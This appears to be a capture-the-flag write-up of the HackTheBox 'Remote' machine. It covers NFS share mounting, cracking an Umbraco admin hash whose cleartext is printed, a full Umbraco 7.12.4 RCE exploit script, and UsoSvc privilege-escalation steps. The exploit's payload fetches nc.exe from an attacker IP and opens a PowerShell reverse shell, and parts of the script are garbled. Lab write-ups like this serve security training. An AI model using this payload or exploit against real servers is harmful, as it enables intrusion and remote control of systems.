by Hello there, welcome back again. Today I’m going to do the walkthrough and write-up on the new HackTheBox Windows easy machine Remote (10.10.10.180) by mrb3n.
This machine is all about finding Windows NFS (Network File System), obtaining password hash, cracking it, getting shell as a user, exploiting Umbraco CMS, getting RCE and finally getting the shell as administrator. I used Umbraco CMS – Remote Code Execution exploit by Gregory DRAPERI & Hugo BOUTINON.
Let’s get started then.
GETTING MY FOOT IN
As always, I added the machine IP (10.10.10.180) to my hosts file as remote.htb and started with an intense NMAP port scan.
The NMAP Scan
$ nmap -T5 -sC -p- -oA nmap.scan remote.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-24 09:55 +03
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m17s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-24T07:10:04
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 849.48 seconds
# root @ ns09 in ~/htb/remote [10:09:16] I found many open ports, majorly Windows RPC ports, Port 80, FTP on 21, port 111 etc.
Upon checking port 80, there is a website “Acme Widgets” running.
The website or the source code did not reveal anything useful, so I proceed to find the hidden directories using GoBuster.
While GoBuster running, I started to reckon the directories detected one by one. There is a blog, an e-commerce store, contact details and there is “/Install” directory. When you see a directory by name “install” you normally stop everything and look in to it, well, I did the same.
When I visit the website http://remote.htb/install it redirected me to http://remote.htb/umbraco/#/login, and I was welcomed me with a login page. 🙂
However, I was not able to go any further because my attempt to brute force the login page failed. I continued run DirBuster and started to look in to other open ports. Until I noticed something unusual.
Windows NFS Mounting
If you clearly noticed the namp scan, there is a port 111 is open. The port 111 RCP Bind normally used to map other RPC services (such as nfs, nlockmgr, quotad, mountd, etc.) to their corresponding port number on the server. Ref
In Linux, you can use showmount command to see the mounted drives and storage from NFS like below:
When I run the showmount command, I noticed the /site_backup storage is mounted and is available for everyone.
With a very simple effort you can mount the public directory to your Kali machine and read the contents. Linux has an option called “Mount” which is similar to the map network drive option in Windows.
Mounting the NFS Share
I created a directory “site_backup” inside my Remote machine working directory and run the command mount -t nfs remote.htb:/site_backups ./site_backup and I have a copy of the site_backup mounted to my Kali machine.
I started to look the directories and files inside the site_backup. The file Web.config didn’t reveal much info. A post in HTB Forums Remote thread, a user mentioned a file with “*sdf” extension would help, so started to look for the file. After spending some time I found Umbraco.sdf inside the directory App_data.
The Umbraco.sdf is a database used by Umbraco CMS. A quick google search led me to this article that shows, How to setting up Umbraco with Visual Studio. This article as well suggests the .sdf file can be opened using MS SQL.
I moved umbraco.config and Umbraco.sdf in to my Windows host machine to work with Visual Studio. Unfortunately, for some reason, I wasn’t able to open the file using my Visual Studio, I keep getting corrupted error. So as a last resort, I tried to open it using my EditPlus text editor (Funny, but this actually works, I had opened a lot of database files using EditPlus and read the contents).
After a little clean-up I made the list of hashed password of admin@htb.local and users smith@htb.local and ssmith@htb.local.
Hashed Credentials:
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32Cracking The Hash using John
I copied the Admin password hash to kali and used John to crack. It took just a couple of seconds to crack.
Clear test credetials:
admin@htb.local:baconandcheese
Next step is logging in to the CMS using the credentials I just cracked.
And I’m in the admin dashboard of Umbraco CMS.
Exploit
After logging the things went pretty straightforward. As I already know the Umbraco version 7.12.4 is exploitable, I without wasting much time download the related exploit from exploit-db https://www.exploit-db.com/exploits/46153 and modified it as per my requirement and add the reverse shell.
My Final Exploit with Payload:
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
import requests;
from bs4 import BeautifulSoup;
def print_dict(dico):
print(dico.items());
print("Start");
# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "i -uri http://10.10.14.5:8080/nc.exe -outfile /nav1n/nc.exe;/nav1n/nc.exe 10.10.14.5 4444 -e powershell"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';
in = "admin@htb.local;
password="baconandcheese";
host = "http://remote.htb";
# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
ur1 = s.get(url_main);
print_dict(r1.cookies);
# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);
# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);
soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);
print("End");As soon as my exploit is ready, I run it from Kali terminal and boom, I have the reverse shell as inetsrv.
User.txt
Once the reverse-shell is connected, I immediately found the User.txt in the Public user’s desktop. I run the exploit twice because I lost the connection – so here are two user flags 😉
Getting The Root
After spending sometime without much clue, I got a tip from one of HTB fellow user. As per him I could modify the service starts with “Usxxxc”. I found the service he mentioned is UsoSvc – Update Orchestrator Service, which is a Windows Update service.
A quick search showed me the UsoSvc exploit under PayloadAllTheThings.
Let us get in to the real business now,
For a successful exploit we need a service account. In our case we have UsoSvc.
Exploit Procedures
- First, stop the service UsoSvc using sc.exe stop UsoSvc command.
- Then, add the custom exploit to the windows bin path for the service account. When the service is restarted, it should run the reverse shell script and it should give the reverse shell in the listener.
- And lastly, Restart the service using sc.exe start usosvc command.
Thank you, appreciate the respect 🙂
